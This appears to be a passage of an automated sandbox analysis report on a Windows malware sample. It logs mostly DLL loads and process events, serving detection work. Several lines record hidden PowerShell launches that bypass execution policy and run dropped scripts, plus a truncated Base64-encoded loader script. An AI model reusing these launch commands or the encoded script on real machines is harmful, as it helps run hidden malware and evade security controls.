              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: apphelp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: c2r64.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: msasn1.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT2